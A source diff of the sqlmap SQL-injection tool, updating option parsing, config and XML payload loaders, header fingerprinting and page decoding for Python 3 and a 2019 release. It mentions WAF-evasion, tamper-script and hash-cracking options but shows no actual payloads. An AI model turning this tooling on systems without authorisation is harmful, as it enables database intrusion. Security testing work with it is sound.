|
|
||||||
|
|
||||||
miscellaneous.add_option("--disable-coloring", dest="disableColoring",
|
miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true",
|
||||||
action="store_true",
|
help="Disable console output coloring")
|
||||||
help="Disable console output coloring")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--gpage", dest="googlePage", type="int",
|
miscellaneous.add_option("--gpage", dest="googlePage", type="int",
|
||||||
help="Use Google dork results from specified page number")
|
help="Use Google dork results from specified page number")
|
||||||
|
|
||||||
miscellaneous.add_option("--identify-waf", dest="identifyWaf",
|
miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true",
|
||||||
action="store_true",
|
help="Make a thorough testing for a WAF/IPS protection")
|
||||||
help="Make a thorough testing for a WAF/IPS/IDS protection")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--mobile", dest="mobile",
|
miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true",
|
||||||
action="store_true",
|
help="Display list of available tamper scripts")
|
||||||
help="Imitate smartphone through HTTP User-Agent header")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--offline", dest="offline",
|
miscellaneous.add_option("--mobile", dest="mobile", action="store_true",
|
||||||
action="store_true",
|
help="Imitate smartphone through HTTP User-Agent header")
|
||||||
help="Work in offline mode (only use session data)")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--purge-output", dest="purgeOutput",
|
miscellaneous.add_option("--offline", dest="offline", action="store_true",
|
||||||
action="store_true",
|
help="Work in offline mode (only use session data)")
|
||||||
help="Safely remove all content from output directory")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--skip-waf", dest="skipWaf",
|
miscellaneous.add_option("--purge", dest="purge", action="store_true",
|
||||||
action="store_true",
|
help="Safely remove all content from sqlmap data directory")
|
||||||
help="Skip heuristic detection of WAF/IPS/IDS protection")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--smart", dest="smart",
|
miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true",
|
||||||
action="store_true",
|
help="Skip heuristic detection of WAF/IPS protection")
|
||||||
help="Conduct thorough tests only if positive heuristic(s)")
|
|
||||||
|
miscellaneous.add_option("--smart", dest="smart", action="store_true",
|
||||||
|
help="Conduct thorough tests only if positive heuristic(s)")
|
||||||
|
|
||||||
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
|
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
|
||||||
help="Prompt for an interactive sqlmap shell")
|
help="Prompt for an interactive sqlmap shell")
|
||||||
|
|
||||||
miscellaneous.add_option("--tmp-dir", dest="tmpDir",
|
miscellaneous.add_option("--tmp-dir", dest="tmpDir",
|
||||||
help="Local directory for storing temporary files")
|
help="Local directory for storing temporary files")
|
||||||
|
|
||||||
miscellaneous.add_option("--web-root", dest="webRoot",
|
miscellaneous.add_option("--web-root", dest="webRoot",
|
||||||
help="Web server document root directory (e.g. \"/var/www\")")
|
help="Web server document root directory (e.g. \"/var/www\")")
|
||||||
|
|
||||||
miscellaneous.add_option("--wizard", dest="wizard",
|
miscellaneous.add_option("--wizard", dest="wizard", action="store_true",
|
||||||
action="store_true",
|
help="Simple wizard interface for beginner users")
|
||||||
help="Simple wizard interface for beginner users")
|
|
||||||
|
|
||||||
# Hidden and/or experimental options
|
# Hidden and/or experimental options
|
||||||
|
parser.add_option("--crack", dest="hashFile",
|
||||||
|
help=SUPPRESS_HELP)
|
||||||
|
# help="Load and crack hashes from a file (standalone)")
|
||||||
|
|
||||||
parser.add_option("--dummy", dest="dummy", action="store_true",
|
parser.add_option("--dummy", dest="dummy", action="store_true",
|
||||||
help=SUPPRESS_HELP)
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
@@ -791,6 +695,9 @@ def cmdLineParser(argv=None):
|
|||||||
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
||||||
help=SUPPRESS_HELP)
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
|
parser.add_option("--force-pivoting", dest="forcePivoting", action="store_true",
|
||||||
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
parser.add_option("--force-threads", dest="forceThreads", action="store_true",
|
parser.add_option("--force-threads", dest="forceThreads", action="store_true",
|
||||||
help=SUPPRESS_HELP)
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
@@ -852,6 +759,7 @@ def cmdLineParser(argv=None):
|
|||||||
prompt = False
|
prompt = False
|
||||||
advancedHelp = True
|
advancedHelp = True
|
||||||
extraHeaders = []
|
extraHeaders = []
|
||||||
|
tamperIndex = None
|
||||||
|
|
||||||
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
||||||
for arg in argv:
|
for arg in argv:
|
||||||
@@ -886,7 +794,7 @@ def cmdLineParser(argv=None):
|
|||||||
command = raw_input("sqlmap-shell> ").strip()
|
command = raw_input("sqlmap-shell> ").strip()
|
||||||
command = getUnicode(command, encoding=sys.stdin.encoding)
|
command = getUnicode(command, encoding=sys.stdin.encoding)
|
||||||
except (KeyboardInterrupt, EOFError):
|
except (KeyboardInterrupt, EOFError):
|
||||||
print
|
print()
|
||||||
raise SqlmapShellQuitException
|
raise SqlmapShellQuitException
|
||||||
|
|
||||||
if not command:
|
if not command:
|
||||||
@@ -908,8 +816,8 @@ def cmdLineParser(argv=None):
|
|||||||
try:
|
try:
|
||||||
for arg in shlex.split(command):
|
for arg in shlex.split(command):
|
||||||
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||||
except ValueError, ex:
|
except ValueError as ex:
|
||||||
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
|
raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % ex.message)
|
||||||
|
|
||||||
for i in xrange(len(argv)):
|
for i in xrange(len(argv)):
|
||||||
if argv[i] == "-hh":
|
if argv[i] == "-hh":
|
||||||
@@ -923,6 +831,12 @@ def cmdLineParser(argv=None):
|
|||||||
elif re.search(r"\A-\w=.+", argv[i]):
|
elif re.search(r"\A-\w=.+", argv[i]):
|
||||||
dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i])
|
dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i])
|
||||||
raise SystemExit
|
raise SystemExit
|
||||||
|
elif argv[i].startswith("--tamper"):
|
||||||
|
if tamperIndex is None:
|
||||||
|
tamperIndex = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None)
|
||||||
|
else:
|
||||||
|
argv[tamperIndex] = "%s,%s" % (argv[tamperIndex], argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else ""))
|
||||||
|
argv[i] = ""
|
||||||
elif argv[i] == "-H":
|
elif argv[i] == "-H":
|
||||||
if i + 1 < len(argv):
|
if i + 1 < len(argv):
|
||||||
extraHeaders.append(argv[i + 1])
|
extraHeaders.append(argv[i + 1])
|
||||||
@@ -930,7 +844,7 @@ def cmdLineParser(argv=None):
|
|||||||
argv[i] = argv[i][:-1]
|
argv[i] = argv[i][:-1]
|
||||||
conf.skipThreadCheck = True
|
conf.skipThreadCheck = True
|
||||||
elif argv[i] == "--version":
|
elif argv[i] == "--version":
|
||||||
print VERSION_STRING.split('/')[-1]
|
print(VERSION_STRING.split('/')[-1])
|
||||||
raise SystemExit
|
raise SystemExit
|
||||||
elif argv[i] in ("-h", "--help"):
|
elif argv[i] in ("-h", "--help"):
|
||||||
advancedHelp = False
|
advancedHelp = False
|
||||||
@@ -954,7 +868,7 @@ def cmdLineParser(argv=None):
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
(args, _) = parser.parse_args(argv)
|
(args, _) = parser.parse_args(argv)
|
||||||
except UnicodeEncodeError, ex:
|
except UnicodeEncodeError as ex:
|
||||||
dataToStdout("\n[!] %s\n" % ex.object.encode("unicode-escape"))
|
dataToStdout("\n[!] %s\n" % ex.object.encode("unicode-escape"))
|
||||||
raise SystemExit
|
raise SystemExit
|
||||||
except SystemExit:
|
except SystemExit:
|
||||||
@@ -976,17 +890,15 @@ def cmdLineParser(argv=None):
|
|||||||
if args.dummy:
|
if args.dummy:
|
||||||
args.url = args.url or DUMMY_URL
|
args.url = args.url or DUMMY_URL
|
||||||
|
|
||||||
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
|
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers, args.hashFile)):
|
||||||
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
|
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). "
|
||||||
args.purgeOutput, args.sitemapUrl)):
|
errMsg += "Use -h for basic and -hh for advanced help\n"
|
||||||
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
|
|
||||||
errMsg += "use -h for basic or -hh for advanced help\n"
|
|
||||||
parser.error(errMsg)
|
parser.error(errMsg)
|
||||||
|
|
||||||
return args
|
return args
|
||||||
|
|
||||||
except (OptionError, TypeError), e:
|
except (OptionError, TypeError) as ex:
|
||||||
parser.error(e)
|
parser.error(ex)
|
||||||
|
|
||||||
except SystemExit:
|
except SystemExit:
|
||||||
# Protection against Windows dummy double clicking
|
# Protection against Windows dummy double clicking
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -39,7 +39,7 @@ def configFileProxy(section, option, datatype):
|
|||||||
value = config.getfloat(section, option) if config.get(section, option) else 0.0
|
value = config.getfloat(section, option) if config.get(section, option) else 0.0
|
||||||
else:
|
else:
|
||||||
value = config.get(section, option)
|
value = config.get(section, option)
|
||||||
except ValueError, ex:
|
except ValueError as ex:
|
||||||
errMsg = "error occurred while processing the option "
|
errMsg = "error occurred while processing the option "
|
||||||
errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
|
errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
@@ -71,7 +71,7 @@ def configFileParser(configFile):
|
|||||||
try:
|
try:
|
||||||
config = UnicodeRawConfigParser()
|
config = UnicodeRawConfigParser()
|
||||||
config.readfp(configFP)
|
config.readfp(configFP)
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex)
|
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex)
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -35,7 +35,7 @@ class FingerprintHandler(ContentHandler):
|
|||||||
if key == "dbmsVersion":
|
if key == "dbmsVersion":
|
||||||
self._info[key] = value
|
self._info[key] = value
|
||||||
else:
|
else:
|
||||||
if key not in self._info.keys():
|
if key not in self._info:
|
||||||
self._info[key] = set()
|
self._info[key] = set()
|
||||||
|
|
||||||
for _ in value.split("|"):
|
for _ in value.split("|"):
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -13,7 +13,6 @@ from lib.core.data import kb
|
|||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.parse.handler import FingerprintHandler
|
from lib.parse.handler import FingerprintHandler
|
||||||
|
|
||||||
|
|
||||||
def headersParser(headers):
|
def headersParser(headers):
|
||||||
"""
|
"""
|
||||||
This function calls a class that parses the input HTTP headers to
|
This function calls a class that parses the input HTTP headers to
|
||||||
@@ -24,18 +23,16 @@ def headersParser(headers):
|
|||||||
if not kb.headerPaths:
|
if not kb.headerPaths:
|
||||||
kb.headerPaths = {
|
kb.headerPaths = {
|
||||||
"microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
|
"microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
|
||||||
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
|
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
|
||||||
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
|
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
|
||||||
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
|
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
|
||||||
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
|
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
|
||||||
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
|
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
|
||||||
}
|
}
|
||||||
|
|
||||||
for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
|
for header in itertools.ifilter(lambda _: _ in kb.headerPaths, headers):
|
||||||
value = headers[header]
|
value = headers[header]
|
||||||
xmlfile = kb.headerPaths[header]
|
xmlfile = kb.headerPaths[header]
|
||||||
|
|
||||||
handler = FingerprintHandler(value, kb.headersFp)
|
handler = FingerprintHandler(value, kb.headersFp)
|
||||||
|
|
||||||
parseXmlFile(xmlfile, handler)
|
parseXmlFile(xmlfile, handler)
|
||||||
parseXmlFile(paths.GENERIC_XML, handler)
|
parseXmlFile(paths.GENERIC_XML, handler)
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -9,6 +9,7 @@ import re
|
|||||||
|
|
||||||
from xml.sax.handler import ContentHandler
|
from xml.sax.handler import ContentHandler
|
||||||
|
|
||||||
|
from lib.core.common import urldecode
|
||||||
from lib.core.common import parseXmlFile
|
from lib.core.common import parseXmlFile
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
@@ -26,6 +27,7 @@ class HTMLHandler(ContentHandler):
|
|||||||
self._dbms = None
|
self._dbms = None
|
||||||
self._page = (page or "")
|
self._page = (page or "")
|
||||||
self._lower_page = self._page.lower()
|
self._lower_page = self._page.lower()
|
||||||
|
self._urldecoded_page = urldecode(self._page)
|
||||||
|
|
||||||
self.dbms = None
|
self.dbms = None
|
||||||
|
|
||||||
@@ -47,7 +49,7 @@ class HTMLHandler(ContentHandler):
|
|||||||
keywords = sorted(keywords, key=len)
|
keywords = sorted(keywords, key=len)
|
||||||
kb.cache.regex[regexp] = keywords[-1].lower()
|
kb.cache.regex[regexp] = keywords[-1].lower()
|
||||||
|
|
||||||
if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
|
if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._urldecoded_page, re.I):
|
||||||
self.dbms = self._dbms
|
self.dbms = self._dbms
|
||||||
self._markAsErrorPage()
|
self._markAsErrorPage()
|
||||||
|
|
||||||
|
|||||||
@@ -1,11 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
|
|
||||||
from xml.etree import ElementTree as et
|
from xml.etree import ElementTree as et
|
||||||
|
|
||||||
@@ -17,6 +18,9 @@ from lib.core.exception import SqlmapInstallationException
|
|||||||
from lib.core.settings import PAYLOAD_XML_FILES
|
from lib.core.settings import PAYLOAD_XML_FILES
|
||||||
|
|
||||||
def cleanupVals(text, tag):
|
def cleanupVals(text, tag):
|
||||||
|
if tag == "clause" and '-' in text:
|
||||||
|
text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text)
|
||||||
|
|
||||||
if tag in ("clause", "where"):
|
if tag in ("clause", "where"):
|
||||||
text = text.split(',')
|
text = text.split(',')
|
||||||
|
|
||||||
@@ -36,7 +40,7 @@ def cleanupVals(text, tag):
|
|||||||
return text
|
return text
|
||||||
|
|
||||||
def parseXmlNode(node):
|
def parseXmlNode(node):
|
||||||
for element in node.getiterator('boundary'):
|
for element in node.getiterator("boundary"):
|
||||||
boundary = AttribDict()
|
boundary = AttribDict()
|
||||||
|
|
||||||
for child in element.getchildren():
|
for child in element.getchildren():
|
||||||
@@ -48,7 +52,7 @@ def parseXmlNode(node):
|
|||||||
|
|
||||||
conf.boundaries.append(boundary)
|
conf.boundaries.append(boundary)
|
||||||
|
|
||||||
for element in node.getiterator('test'):
|
for element in node.getiterator("test"):
|
||||||
test = AttribDict()
|
test = AttribDict()
|
||||||
|
|
||||||
for child in element.getchildren():
|
for child in element.getchildren():
|
||||||
@@ -74,11 +78,11 @@ def parseXmlNode(node):
|
|||||||
def loadBoundaries():
|
def loadBoundaries():
|
||||||
try:
|
try:
|
||||||
doc = et.parse(paths.BOUNDARIES_XML)
|
doc = et.parse(paths.BOUNDARIES_XML)
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
errMsg = "something appears to be wrong with "
|
errMsg = "something appears to be wrong with "
|
||||||
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex))
|
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex))
|
||||||
errMsg += "sure that you haven't made any changes to it"
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
raise SqlmapInstallationException, errMsg
|
raise SqlmapInstallationException(errMsg)
|
||||||
|
|
||||||
root = doc.getroot()
|
root = doc.getroot()
|
||||||
parseXmlNode(root)
|
parseXmlNode(root)
|
||||||
@@ -89,11 +93,11 @@ def loadPayloads():
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
doc = et.parse(payloadFilePath)
|
doc = et.parse(payloadFilePath)
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
errMsg = "something appears to be wrong with "
|
errMsg = "something appears to be wrong with "
|
||||||
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex))
|
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex))
|
||||||
errMsg += "sure that you haven't made any changes to it"
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
raise SqlmapInstallationException, errMsg
|
raise SqlmapInstallationException(errMsg)
|
||||||
|
|
||||||
root = doc.getroot()
|
root = doc.getroot()
|
||||||
parseXmlNode(root)
|
parseXmlNode(root)
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -32,7 +32,7 @@ def parseSitemap(url, retVal=None):
|
|||||||
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||||
except httplib.InvalidURL:
|
except httplib.InvalidURL:
|
||||||
errMsg = "invalid URL given for sitemap ('%s')" % url
|
errMsg = "invalid URL given for sitemap ('%s')" % url
|
||||||
raise SqlmapSyntaxException, errMsg
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
||||||
if abortedFlag:
|
if abortedFlag:
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -17,12 +17,15 @@ from lib.core.common import Backend
|
|||||||
from lib.core.common import extractErrorMessage
|
from lib.core.common import extractErrorMessage
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import getPublicTypeMembers
|
from lib.core.common import getPublicTypeMembers
|
||||||
|
from lib.core.common import getSafeExString
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.common import isListLike
|
||||||
from lib.core.common import randomStr
|
from lib.core.common import randomStr
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import resetCookieJar
|
from lib.core.common import resetCookieJar
|
||||||
from lib.core.common import singleTimeLogMessage
|
from lib.core.common import singleTimeLogMessage
|
||||||
from lib.core.common import singleTimeWarnMessage
|
from lib.core.common import singleTimeWarnMessage
|
||||||
|
from lib.core.common import unArrayizeValue
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
@@ -33,7 +36,6 @@ from lib.core.enums import PLACE
|
|||||||
from lib.core.exception import SqlmapCompressionException
|
from lib.core.exception import SqlmapCompressionException
|
||||||
from lib.core.settings import BLOCKED_IP_REGEX
|
from lib.core.settings import BLOCKED_IP_REGEX
|
||||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import DEV_EMAIL_ADDRESS
|
|
||||||
from lib.core.settings import EVENTVALIDATION_REGEX
|
from lib.core.settings import EVENTVALIDATION_REGEX
|
||||||
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
|
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
|
||||||
from lib.core.settings import META_CHARSET_REGEX
|
from lib.core.settings import META_CHARSET_REGEX
|
||||||
@@ -55,11 +57,11 @@ def forgeHeaders(items=None, base=None):
|
|||||||
|
|
||||||
items = items or {}
|
items = items or {}
|
||||||
|
|
||||||
for _ in items.keys():
|
for _ in list(items.keys()):
|
||||||
if items[_] is None:
|
if items[_] is None:
|
||||||
del items[_]
|
del items[_]
|
||||||
|
|
||||||
headers = OrderedDict(base or conf.httpHeaders)
|
headers = OrderedDict(conf.httpHeaders if base is None else base)
|
||||||
headers.update(items.items())
|
headers.update(items.items())
|
||||||
|
|
||||||
class _str(str):
|
class _str(str):
|
||||||
@@ -108,7 +110,9 @@ def forgeHeaders(items=None, base=None):
|
|||||||
kb.mergeCookies = readInput(message, default='Y', boolean=True)
|
kb.mergeCookies = readInput(message, default='Y', boolean=True)
|
||||||
|
|
||||||
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
|
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
|
||||||
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x)
|
def _(value):
|
||||||
|
return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value)
|
||||||
|
|
||||||
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
||||||
|
|
||||||
if PLACE.COOKIE in conf.parameters:
|
if PLACE.COOKIE in conf.parameters:
|
||||||
@@ -150,13 +154,16 @@ def checkCharEncoding(encoding, warn=True):
|
|||||||
'utf8'
|
'utf8'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
if isListLike(encoding):
|
||||||
|
encoding = unArrayizeValue(encoding)
|
||||||
|
|
||||||
if encoding:
|
if encoding:
|
||||||
encoding = encoding.lower()
|
encoding = encoding.lower()
|
||||||
else:
|
else:
|
||||||
return encoding
|
return encoding
|
||||||
|
|
||||||
# Reference: http://www.destructor.de/charsets/index.htm
|
# Reference: http://www.destructor.de/charsets/index.htm
|
||||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
||||||
|
|
||||||
for delimiter in (';', ',', '('):
|
for delimiter in (';', ',', '('):
|
||||||
if delimiter in encoding:
|
if delimiter in encoding:
|
||||||
@@ -213,10 +220,6 @@ def checkCharEncoding(encoding, warn=True):
|
|||||||
try:
|
try:
|
||||||
codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
|
codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
|
||||||
except (LookupError, ValueError):
|
except (LookupError, ValueError):
|
||||||
if warn:
|
|
||||||
warnMsg = "unknown web page charset '%s'. " % encoding
|
|
||||||
warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS
|
|
||||||
singleTimeLogMessage(warnMsg, logging.WARN, encoding)
|
|
||||||
encoding = None
|
encoding = None
|
||||||
|
|
||||||
if encoding:
|
if encoding:
|
||||||
@@ -278,10 +281,10 @@ def decodePage(page, contentEncoding, contentType):
|
|||||||
raise Exception("size too large")
|
raise Exception("size too large")
|
||||||
|
|
||||||
page = data.read()
|
page = data.read()
|
||||||
except Exception, msg:
|
except Exception as ex:
|
||||||
if "<html" not in page: # in some cases, invalid "Content-Encoding" appears for plain HTML (should be ignored)
|
if "<html" not in page: # in some cases, invalid "Content-Encoding" appears for plain HTML (should be ignored)
|
||||||
errMsg = "detected invalid data for declared content "
|
errMsg = "detected invalid data for declared content "
|
||||||
errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg)
|
